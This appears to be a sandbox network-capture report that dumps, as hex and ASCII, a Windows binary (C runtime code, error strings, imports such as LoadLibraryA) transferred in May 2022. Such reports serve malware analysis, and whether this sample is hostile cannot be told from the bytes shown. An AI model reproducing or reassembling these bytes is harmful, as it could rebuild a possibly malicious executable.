                                                                                                                          2022-05-21 07:33:06 UTC3318INData Raw: 10 8b 45 08 a3 44 b6 00 10 89 3d 5c b9 00 10 5b 5f 5e c9 c3 a1 58 b9 00 10 56 8b 35 48 b9 00 10 57 33 ff 3b f0 75 34 83 c0 10 6b c0 14 50 ff 35 4c b9 00 10 57 ff 35 64 b1 00 10 ff 15 cc 80 00 10 3b c7 75 04 33 c0 eb 78 83 05 58 b9 00 10 10 8b 35 48 b9 00 10 a3 4c b9 00 10 6b f6 14 03 35 4c b9 00 10 68 c4 41 00 00 6a 08 ff 35 64 b1 00 10 ff 15 18 80 00 10 3b c7 89 46 10 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 c8 80 00 10 3b c7 89 46 0c 75 12 ff 76 10 57 ff 35 64 b1 00 10 ff 15 10 80 00 10 eb 9b 83 4e 08 ff 89 3e 89 7e 04 ff 05 48 b9 00 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a
                                                                                                                          Data Ascii: ED=\[_^XV5HW3;u4kP5LW5d;u3xX5HLk5LhAj5d;Ftjh hW;FuvW5dN>~HF_^UQQMASVqW3C}i0Dj?EZ@@J
                                                                                                                          2022-05-21 07:33:06 UTC3319INData Raw: 75 0a 83 c3 14 3b d9 89 5d 08 72 f0 3b d9 75 15 e8 a6 fa ff ff 8b d8 85 db 89 5d 08 75 07 33 c0 e9 09 02 00 00 53 e8 40 fb ff ff 59 8b 4b 10 89 01 8b 43 10 83 38 ff 74 e5 89 1d 54 b9 00 10 8b 43 10 8b 10 83 fa ff 89 55 fc 74 14 8b 8c 90 c4 00 00 00 8b 7c 90 44 23 4d f8 23 fe 0b cf 75 29 83 65 fc 00 8b 90 c4 00 00 00 8d 48 44 8b 39 23 55 f8 23 fe 0b d7 75 0e ff 45 fc 8b 91 84 00 00 00 83 c1 04 eb e7 8b 55 fc 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4c 90 44 33 ff 23 ce 75 12 8b 8c 90 c4 00 00 00 23 4d f8 6a 20 5f eb 03 03 c9 47 85 c9 7d f9 8b 4d f4 8b 54 f9 04 8b 0a 2b 4d f0 8b f1 c1 fe 04 4e 83 fe 3f 89 4d f8 7e 03 6a 3f 5e 3b f7 0f 84 01 01 00 00 8b 4a 04 3b 4a 08 75 5c 83 ff 20 bb 00 00 00 80 7d 26 8b cf d3 eb 8b 4d fc 8d 7c 38 04 f7 d3
                                                                                                                          Data Ascii: u;]r;u]u3S@YKC8tTCUt|D#M#u)eHD9#U#uEUiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8
                                                                                                                          2022-05-21 07:33:06 UTC3320INData Raw: ff 75 e4 e8 7b 02 00 00 53 ff 75 e0 e8 3d f2 ff ff 83 c4 14 c7 45 fc fe ff ff ff e8 2e 00 00 00 83 7d e0 00 75 31 85 f6 75 01 46 83 c6 0f 83 e6 f0 89 75 0c 56 53 6a 00 ff 35 64 b1 00 10 ff 15 cc 80 00 10 8b f8 eb 12 8b 75 0c 8b 5d 08 6a 04 e8 47 df ff ff 59 c3 8b 7d e4 85 ff 0f 85 bf 00 00 00 39 3d 68 b6 00 10 74 2c 56 e8 32 e7 ff ff 59 85 c0 0f 85 d2 fe ff ff e8 8c e1 ff ff 39 7d e0 75 6c 8b f0 ff 15 54 80 00 10 50 e8 3e e1 ff ff 59 89 06 eb 5f 85 ff 0f 85 83 00 00 00 e8 67 e1 ff ff 39 7d e0 74 68 c7 00 0c 00 00 00 eb 71 85 f6 75 01 46 56 53 6a 00 ff 35 64 b1 00 10 ff 15 cc 80 00 10 8b f8 85 ff 75 56 39 05 68 b6 00 10 74 34 56 e8 c9 e6 ff ff 59 85 c0 74 1f 83 fe e0 76 cd 56 e8 b9 e6 ff ff 59 e8 1b e1 ff ff c7 00 0c 00 00 00 33 c0 e8 e0 d9 ff ff c3 e8 08
                                                                                                                          Data Ascii: u{Su=E.}u1uFuVSj5du]jGY}9=ht,V2Y9}ulTP>Y_g9}thquFVSj5duV9ht4VYtvVY3
                                                                                                                          2022-05-21 07:33:06 UTC3322INData Raw: 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 d0 52 00 10 8b ff e0 52 00 10 e8 52 00 10 f8 52 00 10 0c 53 00 10 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8b 45 08 5e 5f c9 c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 cc cc cc 53 56 57 8b 54 24 10 8b 44 24 14 8b 4c 24 18 55 52 50 51 51 68 b8 53 00 10 64 ff 35 00 00 00 00 a1 00 a0 00 10 33 c4 89 44 24 08 64 89 25 00 00 00 00 8b 44 24 30 8b 58 08 8b 4c 24 2c 33 19 8b 70 0c 83 fe fe 74 3b 8b 54 24 34 83 fa fe 74 04 3b f2 76 2e 8d 34 76 8d 5c b3 10 8b 0b 89 48 0c 83 7b 04 00 75 cc 68 01 01 00 00 8b 43
                                                                                                                          Data Ascii: DDDDDDDDD$RRRRSE^_FGE^_IFGFGE^_FGFGFGE^_SVWT$D$L$URPQQhSd53D$d%D$0XL$,3pt;T$4t;v.4v\H{uhC
                                                                                                                          2022-05-21 07:33:06 UTC3323INData Raw: f3 ab 85 d2 74 0a 88 07 83 c7 01 83 ea 01 75 f6 8b 44 24 08 5f c3 8b 44 24 04 c3 6a 10 68 b8 94 00 10 e8 be cf ff ff 33 c0 8b 5d 08 33 ff 3b df 0f 95 c0 3b c7 75 1d e8 1c d7 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 ad d6 ff ff 83 c4 14 83 c8 ff eb 53 83 3d 68 b9 00 10 03 75 38 6a 04 e8 5e d5 ff ff 59 89 7d fc 53 e8 03 e7 ff ff 59 89 45 e0 3b c7 74 0b 8b 73 fc 83 ee 09 89 75 e4 eb 03 8b 75 e4 c7 45 fc fe ff ff ff e8 25 00 00 00 39 7d e0 75 10 53 57 ff 35 64 b1 00 10 ff 15 d4 80 00 10 8b f0 8b c6 e8 7e cf ff ff c3 33 ff 8b 5d 08 8b 75 e4 6a 04 e8 2e d4 ff ff 59 c3 6a 02 e8 4f bb ff ff 59 c3 55 8d ac 24 58 fd ff ff 81 ec 28 03 00 00 a1 00 a0 00 10 33 c5 89 85 a4 02 00 00 f6 05 50 aa 00 10 01 56 74 08 6a 0a e8 80 d1 ff ff 59 e8 3d d9 ff ff 85 c0 74 08 6a 16
                                                                                                                          Data Ascii: tuD$_D$jh3]3;;uWWWWWS=hu8j^Y}SYE;tsuuE%9}uSW5d~3]uj.YjOYU$X(3PVtjY=tj
                                                                                                                          2022-05-21 07:33:06 UTC3324INData Raw: 00 10 eb 05 a1 60 b6 00 10 83 f8 02 0f 84 cf 00 00 00 3b c3 0f 84 c7 00 00 00 83 f8 01 0f 85 e8 00 00 00 39 5d 18 89 5d f8 75 08 8b 07 8b 40 04 89 45 18 8b 35 d8 80 00 10 33 c0 39 5d 20 53 53 ff 75 10 0f 95 c0 ff 75 0c 8d 04 c5 01 00 00 00 50 ff 75 18 ff d6 8b f8 3b fb 0f 84 ab 00 00 00 7e 3c 81 ff f0 ff ff 7f 77 34 8d 44 3f 08 3d 00 04 00 00 77 13 e8 1e 0d 00 00 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 90 ec ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b d8 85 db 74 69 8d 04 3f 50 6a 00 53 e8 9a f9 ff ff 83 c4 0c 57 53 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff d6 85 c0 74 11 ff 75 14 50 53 ff 75 08 ff 15 e4 80 00 10 89 45 f8 53 e8 86 fb ff ff 8b 45 f8 59 eb 75 33 f6 39 5d 1c 75 08 8b 07 8b 40 14 89 45 1c 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 ff 75
                                                                                                                          Data Ascii: `;9]]u@E539] SSuuPu;~<w4D?=w;tP;Ytti?PjSWSuujutuPSuESEYu39]u@E9]u@Eu
                                                                                                                          2022-05-21 07:33:07 UTC3326INData Raw: 32 31 36 38 0d 0a 38 83 c0 08 3d 00 04 00 00 77 16 e8 e4 08 00 00 8b fc 3b fb 74 dd c7 07 cc cc 00 00 83 c7 08 eb 1a 50 e8 53 e8 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b f8 eb 02 33 ff 3b fb 74 b4 ff 75 f8 53 57 e8 5b f5 ff ff 83 c4 0c ff 75 f8 57 ff 75 14 ff 75 f4 ff 75 0c ff 75 08 ff d6 3b c3 89 45 f8 75 04 33 f6 eb 25 ff 75 1c 8d 45 f8 ff 75 18 50 57 ff 75 20 ff 75 ec e8 2f 09 00 00 8b f0 89 75 f0 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 29 f7 ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 e8 80 00 10 8b f0 39 5d f4 74 09 ff 75 f4 e8 dd b9 ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 ca b9 ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 30 ad ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 d6 d7 ff ff ff 75
                                                                                                                          Data Ascii: 21688=w;tPS;Yt3;tuSW[uWuuuu;Eu3%uEuPWu u/u#uW)Yuuuuuu9]tuYE;t9EtPYe_^[M30UuMu
                                                                                                                          2022-05-21 07:33:07 UTC3327INData Raw: 8b d1 0b d7 75 4a 8b 75 10 8b ce 83 e1 7f 89 4d e8 3b f1 74 13 2b f1 56 53 50 e8 27 ff ff ff 83 c4 0c 8b 45 08 8b 4d e8 85 c9 74 77 8b 5d 10 8b 55 0c 03 d3 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10 89 4d e4 8b 75 0c 8b 7d 08 8b 4d e4 f3 a4 8b 4d 08 03 4d e4 8b 55 0c 03 55 e4 8b 45 10 2b 45 e4 50 52 51 e8 4c ff ff ff 83 c4 0c 8b 45 08 eb 1a 8b 75 0c 8b 7d 08 8b 4d 10 8b d1 c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 8b 45 08 8b 5d fc 8b 75 f8 8b 7d f4 8b e5 5d c3 83 25 40 b9 00 10 00 e8 a1 05 00 00 a3 40 b9 00 10 33 c0 c3 cc 55 8b ec 53 56 57 55 6a 00 6a 00 68 1c 68 00 10 ff 75 08 e8 92 0a 00 00 5d 5f 5e 5b 8b e5 5d c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 32 8b 44 24 14 8b 48 fc 33
                                                                                                                          Data Ascii: uJuM;t+VSP'EMtw]U+U+]u}MES;u5Mu}MMMUUE+EPRQLEu}ME]u}]%@@3USVWUjjhhu]_^[]L$At2D$H3
                                                                                                                          2022-05-21 07:33:07 UTC3329INData Raw: c4 0c 56 ff 75 e4 ff 75 dc ff 75 d8 6a 01 ff 75 08 ff d3 85 c0 74 7f 8b 5d cc 3b df 74 1d 57 57 ff 75 1c 53 56 ff 75 e4 57 ff 75 0c ff 15 84 80 00 10 85 c0 74 60 89 5d e0 eb 5b 39 7d d4 8b 1d 84 80 00 10 75 14 57 57 57 57 56 ff 75 e4 57 ff 75 0c ff d3 8b f0 3b f7 74 3c 56 6a 01 e8 5b b0 ff ff 3b c7 59 59 89 45 e0 74 2b 57 57 56 50 56 ff 75 e4 57 ff 75 0c ff d3 3b c7 75 0e ff 75 e0 e8 6a af ff ff 59 89 7d e0 eb 0b 83 7d dc ff 74 05 8b 4d d0 89 01 ff 75 e4 e8 73 ec ff ff 59 8b 45 e0 8d 65 c0 5f 5e 5b 8b 4d fc 33 cd e8 b6 a2 ff ff c9 c3 6a 0c 68 d8 94 00 10 e8 7c ba ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8
                                                                                                                          Data Ascii: Vuuujut];tWWuSVuWut`][9}uWWWWVuWu;t<Vj[;YYEt+WWVPVuWu;uujY}}tMusYEe_^[M3jh|ef(E#E=t=t33@eeEE
                                                                                                                          2022-05-21 07:33:07 UTC3330INData Raw: c0 8a 44 24 08 53 8b d8 c1 e0 08 8b 54 24 08 f7 c2 03 00 00 00 74 15 8a 0a 83 c2 01 3a cb 74 cf 84 c9 74 51 f7 c2 03 00 00 00 75 eb 0b d8 57 8b c3 c1 e3 10 56 0b d8 8b 0a bf ff fe fe 7e 8b c1 8b f7 33 cb 03 f0 03 f9 83 f1 ff 83 f0 ff 33 cf 33 c6 83 c2 04 81 e1 00 01 01 81 75 1c 25 00 01 01 81 74 d3 25 00 01 01 01 75 08 81 e6 00 00 00 80 75 c4 5e 5f 5b 33 c0 c3 8b 42 fc 3a c3 74 36 84 c0 74 ef 3a e3 74 27 84 e4 74 e7 c1 e8 10 3a c3 74 15 84 c0 74 dc 3a e3 74 06 84 e4 74 d4 eb 96 5e 5f 8d 42 ff 5b c3 8d 42 fe 5e 5f 5b c3 8d 42 fd 5e 5f 5b c3 8d 42 fc 5e 5f 5b c3 ff 25 d0 80 00 10 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec b8 01 00 00 00 5d c3 cc cc cc cc cc cc 55 8b ec b8 01 00 00 00 5d c3 cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 89 45 fc 83 7d fc 01 74 02
                                                                                                                          Data Ascii: D$ST$t:ttQuWV~333u%t%uu^_[3B:t6t:t't:tt:tt^_B[B^_[B^_[B^_[%U]U]UQEE}t
                                                                                                                          2022-05-21 07:33:07 UTC3331INData Raw: c0 00 75 07 33 c0 e9 77 01 00 00 8d 45 a4 50 e8 a2 fd ff ff 83 c4 04 89 45 c4 83 7d c4 00 75 07 33 c0 e9 5b 01 00 00 8b 4d f4 81 c1 11 11 11 11 89 4d f4 8b 55 f0 81 c2 11 11 11 11 89 55 f0 8b 45 f8 05 11 11 11 11 89 45 f8 8d 4d f0 51 e8 63 fd ff ff 83 c4 04 89 45 cc 83 7d cc 00 75 07 33 c0 e9 1c 01 00 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 00 68 00 00 00 80 8b 55 10 52 ff 55 d0 89 45 d4 83 7d d4 ff 75 05 e9 e1 00 00 00 6a 00 8b 45 d4 50 ff 55 c0 89 45 ec c7 45 a0 00 00 00 00 83 7d ec 01 73 05 e9 c3 00 00 00 6a 00 8d 4d e4 51 6a 04 8d 55 c8 52 8b 45 d4 50 ff 55 c4 85 c0 74 3a 83 7d c8 00 74 2c 83 7d ec 00 74 26 8b 4d c8 3b 4d ec 76 1e c7 45 a0 01 00 00 00 8b 55 c8 81 ea ea d9 01 00 89 55 c8 8b 45 c8 2d 40 5d c6 00 89 45 c8 8b 4d c8 89 4d e8 eb 02 eb 70 8b
                                                                                                                          Data Ascii: u3wEPE}u3[MMUUEEMQcE}u3jhjjjhURUE}ujEPUEE}sjMQjUREPUt:}t,}t&M;MvEUUE-@]EMMp
                                                                                                                          2022-05-21 07:33:07 UTC3333INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:33:07 UTC3334INData Raw: 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c 6f 61 64 20 74 68 65 20 43 20 72 75 6e 74 69 6d 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 74 6c 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 27 73 20 73 75 70 70 6f 72 74 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0d 0a 00 00 00 00 00 00 52 36 30 33 33 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 75 73 65 20 4d 53 49 4c 20 63 6f 64 65 20 66 72 6f 6d 20 74 68 69 73 20 61 73 73 65 6d 62 6c 79 20 64 75 72 69 6e 67 20 6e 61 74 69 76 65 20 63 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67
                                                                                                                          Data Ascii: plication has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug
                                                                                                                          2022-05-21 07:33:07 UTC3334INData Raw: 34 32 61 31 0d 0a 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 6f 72 20 66 72 6f 6d 20 44 6c 6c 4d 61 69 6e 2e 0d 0a 00 00 52 36 30 33 32 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 6c 6f 63 61 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0d 0a 00 00 00 00 00 00 52 36 30 33 31 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 43 52 54 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 63 65 2e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20
                                                                                                                          Data Ascii: 42a1ction from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.R6030- CRT not initializedR6028-
                                                                                                                          2022-05-21 07:33:07 UTC3336INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00
                                                                                                                          Data Ascii: ((
                                                                                                                          2022-05-21 07:33:07 UTC3337INData Raw: e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6
                                                                                                                          Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                          2022-05-21 07:33:07 UTC3338INData Raw: ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 6c 30 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 68 31 00 10 7c 31 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff ae 31 00 10 b2 31 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 c0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 a0 33 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff 96 34 00 10 ad 34 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 fb 37 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 ad 3a 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 c1 3e 00 10 00 00 00 00
                                                                                                                          Data Ascii: l0h1|1113447:>
                                                                                                                          2022-05-21 07:33:07 UTC3340INData Raw: 48 65 61 70 44 65 73 74 72 6f 79 00 12 02 48 65 61 70 43 72 65 61 74 65 00 00 83 03 56 69 72 74 75 61 6c 46 72 65 65 00 a3 02 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 df 01 47 65 74 54 69 63 6b 43 6f 75 6e 74 00 00 43 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 ca 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 a4 03 57 72 69 74 65 46 69 6c 65 00 51 02 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 98 00 45 6e 74 65 72 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 52 02 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 23 02 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 04 01 47 65 74 43 50 49 6e 66 6f 00 fd 00 47 65 74 41 43 50 00
                                                                                                                          Data Ascii: HeapDestroyHeapCreateVirtualFreeQueryPerformanceCounterGetTickCountCGetCurrentProcessIdGetSystemTimeAsFileTimeWriteFileQLeaveCriticalSectionEnterCriticalSectionRLoadLibraryA#InitializeCriticalSectionGetCPInfoGetACP
                                                                                                                          2022-05-21 07:33:07 UTC3341INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:33:07 UTC3342INData Raw: 16 00 00 00 59 00 00 00 0b 00 00 00 6c 00 00 00 0d 00 00 00 6d 00 00 00 20 00 00 00 70 00 00 00 1c 00 00 00 72 00 00 00 09 00 00 00 06 00 00 00 16 00 00 00 80 00 00 00 0a 00 00 00 81 00 00 00 0a 00 00 00 82 00 00 00 09 00 00 00 83 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 91 00 00 00 29 00 00 00 9e 00 00 00 0d 00 00 00 a1 00 00 00 02 00 00 00 a4 00 00 00 0b 00 00 00 a7 00 00 00 0d 00 00 00 b7 00 00 00 11 00 00 00 ce 00 00 00 02 00 00 00 d7 00 00 00 0b 00 00 00 18 07 00 00 0c 00 00 00 0c 00 00 00 08 00 00 00 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 94 8b 00 10 00 00 00 00 43 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: Ylm pr)XXXXXXXXXXC
                                                                                                                          2022-05-21 07:33:07 UTC3344INData Raw: 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 a5 00 10 01 02 04 08 a4 03 00 00 60 82 79 82 21 00 00 00 00 00 00 00 a6 df 00 00 00 00 00 00 a1 a5 00 00 00 00 00 00 81 9f e0 fc 00 00 00 00 40 7e 80 fc 00 00 00 00 a8 03 00 00 c1 a3 da a3 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 fe 00 00 00 00 00 00 40 fe 00 00
                                                                                                                          Data Ascii: EFGHIJKLMNOPQRSTUVWXYZ0`y!@~ @
                                                                                                                          2022-05-21 07:33:07 UTC3345INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
